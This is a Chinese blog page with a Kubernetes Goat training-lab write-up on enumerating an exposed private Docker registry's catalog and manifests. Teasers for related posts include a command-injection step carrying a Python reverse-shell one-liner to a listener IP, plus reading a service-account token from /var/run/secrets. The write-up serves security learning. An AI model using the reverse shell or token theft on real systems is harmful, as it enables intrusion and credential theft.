avatar
文章
128
标签
47
分类
8
主页
全部文章
标签
分类
链接
关于
Putdownd’s BlogKubernetes Goat 07 - Attacking private registry 返回首页
主页
全部文章
标签
分类
链接
关于

Kubernetes Goat 07 - Attacking private registry

发表于2023-10-28|更新于2026-06-12|Kubernetes安全
|浏览量:

Attacking private registry

攻击私有仓库

  • http://192.168.72.129:1235/

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-28_16-59-52_d41d8cd98f00b204e9800998ecf8427e.jpg

  • http://192.168.72.129:1235/v2/
  • http://192.168.32.130:1235/v2/\_catalog,查看docker仓库信息

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-28_17-00-57_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 根据官方文档:https://docs.docker.com/registry/
1
http://192.168.72.129:1235/v2/_catalog/adhuakula/k8s-goat-users-repo/manifests/latest

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-28_17-02-29_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 往下翻一翻配置文件

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-28_17-04-44_d41d8cd98f00b204e9800998ecf8427e.jpg

文章作者: putdown
文章链接: https://blog.putdown.top/archives/b5ada9a5.html
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Putdownd’s Blog!
Kubernetes Goat云原生
上一篇
Kubernetes Goat 08 & 09 & 10
08:NodePort exposed servicesNodePort 暴露的服务12345nmap 192.168.72.129 -sT -p30000-32767PORT STATE SERVICE30003/tcp open amicon-fpsu-ra 09:Helm v2 tiller to PwN the clusterHelm v2 tiller 风险 此方案已被弃用,供学习参考,环境默认是 Helm v3版本,可以安装Helm v2版本来实验 10:Analyzing crypto miner container分析被部署挖矿软件的容器镜像 查看工作任务详情 1kubectl describe job batch-check-job 获取Pod信息 1kubectl get pods --namespace default -l "job-name=batch-check-job" 获取pod信息manifest并分析 1kubectl get pod batch-check-job-gpfq4 -o yaml...
下一篇
Kubernetes Goat 06 - Kubernetes CIS benchmarks analysis
Kubernetes CIS benchmarks analysisK8S CIS基线分析1cd /kubernetes-goat 12kubectl apply -f scenarios/kube-bench-security/node-job.yamlkubectl apply -f scenarios/kube-bench-security/master-job.yaml 1kubectl get pod 1kubectl logs -f kube-bench-master-xf2x9 结束
相关推荐
2023-10-27
Kubernetes Goat 01
Kubernetes Goat 01 开发人员倾向于将敏感信息提交给版本控制系统。当我们转向 CI/CD 和 GitOps 系统时,我们往往会忘记识别代码和提交中的敏感信息。让我们看看能不能在这里找到一些很酷的东西! 提示源码泄露 目标网站 http://192.168.72.129:1230/ 开始测试目录扫描 git泄露 利用工具:https://github.com/arthaud/git-dumper goat是自定义下载的文件夹 1python git_dumper.py http://192.168.72.129:1230/ goat git命令 windows没有git环境 git下载:https://git-scm.com/ 查看log 使用git checkout查看 git checkout -f 进行切换 ls -la查看所有文件 查看.env 结束
2023-10-26
k8s-环境搭建
搭建环境 虚拟机:Ubuntu 22.04 虚拟机配置4C/4G 使用minikube搭建 配置proxychains ;在下面wget curl等下载文件时不能正常下载时使用 参考 https://icybersec.gitbook.io/cybersecuritynote/yun-wei-pei-zhi/kubernetes/an-zhuang-bu-shu#an-zhuang-minikube https://blog.csdn.net/QiVictory/article/details/119535043 开始搭建安装docker1apt install -y docker.io go语言环境-编译cri-dockerd的go版本要大于1.9.1 第一种,官方,执行./installer_linux报错的话建议第二种, 1234wget https://storage.googleapis.com/golang/getgo/installer_linuxchmod +x ./installer_linux./installer_linuxsource ~...
2023-10-27
Kubernetes Goat 02 - docker in docker
Kubernetes Goat 02 - docker in docker 靶机ip:http://192.168.72.129:1231/ 能执行ping命令 职业习惯加个管道符 反弹shell 尝试使用bash来反弹没有成功 使用python反弹执行成功 监听 执行命令 1192.168.88.43 | python -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.88.43",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' 判断环境 ls -la  mount docker in docker “Docker in Docker” (DinD) 是一种在 Docker 容器内部运行 Docker 的实践方法。它允许您在一个容器中运行和管理 Docker 容器,而无需在宿主机上安装 Docker。 doc...
2023-10-31
Kubernetes Goat 16 - RBAC least privileges misconfiguration
RBAC least privileges misconfigurationRBAC 最低特权配置错误 由于Kubernetes默认情况下将所有secrets、tokens和service accounts信息都存储在一个固定的目录。直接访问这个目录,查找敏感的信息: 1cd /var/run/secrets/kubernetes.io/serviceaccount/ 要指向内部 API 服务器主机名,我们可以从环境变量中导出它 1export APISERVER=https://${KUBERNETES_SERVICE_HOST} 设置 ServiceAccount 令牌的路径 1export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount 设置命名空间值 1export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace) 读取 ServiceAccount token 1export TOKEN=$...
2023-10-28
Kubernetes Goat 03 - SSRF in the Kubernetes (K8S) world
SSRF in the Kubernetes (K8S) world SSRF 可以使用bp抓包爆破判断端口号 找到5000端口 根据回显继续访问 找到新的路径 继续往下拼接 就这样以此类推 1http://metadata-db/latest/secrets/kubernetes-goat 解密 1azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI= 1k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab
2023-10-30
Kubernetes Goat 11 - Kubernetes namespaces bypass
Kubernetes namespaces bypassKubernetes 命名空间绕过 运行hacker-container镜像 1kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh 报错的话运行这一条 1kubectl run -it hacker-container-2 --image=madhuakula/hacker-container -- sh 查看ip 寻找redis 1nmap -sT -open -p 6379 10.244.0.0/16 连接redis 1redis-cli -h 10.244.0.7 集群内还有许多其他的服务和资源,比如ElasticSearch,Mongo等等
目录
  1. Attacking private registry
  2. 攻击私有仓库
© 2020 - 2026 By putdown
Welcome to lie down